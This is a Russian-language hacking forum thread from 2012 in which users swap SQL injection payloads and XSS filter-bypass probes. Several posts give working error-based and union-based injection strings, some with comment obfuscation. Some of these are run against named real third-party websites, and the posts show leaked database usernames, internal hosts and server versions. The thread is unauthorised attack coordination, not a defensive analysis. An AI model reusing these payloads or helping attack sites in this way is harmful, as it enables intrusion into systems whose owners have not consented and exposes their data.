HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20251  
Старый 29.03.2012, 20:55
Unknown
Guest
Сообщений: n/a
Провел на форуме:
9763

Репутация: 8
По умолчанию

Цитата:
Сообщение от GaMeSTeR  
GaMeSTeR said:
Ссылку бы дал. Можешь вот этот код пихнуть:
'+or+(select+count(*)from(select+1+union+select+2+ union+select+3)x+group+by+concat(mid((select+versi on()+),1,64),floor(rand(0)*2)))+--+
или так:
'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/version()/**/),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
Минус только ограничение на вывод 63 байта
спасибо друг
 
Ответить с цитированием

  #20252  
Старый 30.03.2012, 14:46
ReV0LVeR
Guest
Сообщений: n/a
Провел на форуме:
11980

Репутация: 1
По умолчанию

Каким образом обойти фильтрацию спец символов при xss ? мультибайт и кодирование не причем.
 
Ответить с цитированием

  #20253  
Старый 30.03.2012, 15:01
mr.Penguin
Guest
Сообщений: n/a
Провел на форуме:
10816

Репутация: 74
По умолчанию

Цитата:
Сообщение от ReV0LVeR  
ReV0LVeR said:
Каким образом обойти фильтрацию спец символов при xss ? мультибайт и кодирование не причем.
Есть много способов обхода фильтрации XSS. Лучше скажите, какие символы фильтруются.

Попробуйте ввести следующее символы:

Код:
Code:
'';!--"=&{()}
и посмотрите в исходном коде HTML страницы, какие символы отфильтровались, а какие нет.
 
Ответить с цитированием

  #20254  
Старый 30.03.2012, 15:04
ReV0LVeR
Guest
Сообщений: n/a
Провел на форуме:
11980

Репутация: 1
По умолчанию

'';!--"<xss>=&{()}
 
Ответить с цитированием

  #20255  
Старый 30.03.2012, 15:08
mr.Penguin
Guest
Сообщений: n/a
Провел на форуме:
10816

Репутация: 74
По умолчанию

Цитата:
Сообщение от ReV0LVeR  
ReV0LVeR said:
'';!--"<xss>=&{()}
Как Вы видите, практически все спец. символы фильтруются.

Увы, но обойти в Вашем случае фильтрацию нельзя.
 
Ответить с цитированием

  #20256  
Старый 30.03.2012, 19:54
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

народ, чёт не могу тут нечё сделать, подскажите

http://www.azyb.net/cgi-bin/jurn/main.cgi?id=877+and%28select+1+from%28select+count %28*%29,concat%28%28select+version%28%29%29,0x00,f loor%28rand%280%29*2%29%29x+from+information_schem a.tables+group+by+x%29a%29--+
 
Ответить с цитированием

  #20257  
Старый 30.03.2012, 19:59
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
народ, чёт не могу тут нечё сделать, подскажите
http://www.azyb.net/cgi-bin/jurn/main.cgi?id=877+and%28select+1+from%28select+count %28*%29,concat%28%28select+version%28%29%29,0x00,f loor%28rand%280%29*2%29%29x+from+information_schem a.tables+group+by+x%29a%29--+
Код:
Code:
http://www.azyb.net/cgi-bin/jurn/main.cgi?id=87/**/and(select+1/**/from(select+count(*),concat((select+table_name/**/from/**/information_schema.tables/**/limit/**/1,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)--+g
Access denied for user 'azyb'@'127.0.0.27' to database 'information_schema'.

Брути таблицы...
 
Ответить с цитированием

  #20258  
Старый 30.03.2012, 20:28
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

блин, плохо, а тут постоянно переадресация чтобы не ввёл

http://www.33hochu.ru/fanclub.php?id=956%27

как с ней справится?
 
Ответить с цитированием

  #20259  
Старый 31.03.2012, 00:14
vlad-i-mir
Guest
Сообщений: n/a
Провел на форуме:
2160

Репутация: 0
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
блин, плохо, а тут постоянно переадресация чтобы не ввёл
http://www.33hochu.ru/fanclub.php?id=956%27
как с ней справится?
Взгляни лучше сюда:

http://www.33hochu.ru/view_foto.php?id=82426'+union+select+version(),dat abase()+--+

Смотреть исходный код страницы. Дальше разберешься?

user()=33h

database()=33h@10.10.10.21

version()=5.5.22-1~dotdeb.0-log
 
Ответить с цитированием

  #20260  
Старый 31.03.2012, 00:28
kise
Guest
Сообщений: n/a
Провел на форуме:
17281

Репутация: -4
По умолчанию

Если я не ошибаюсь, то там blind.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ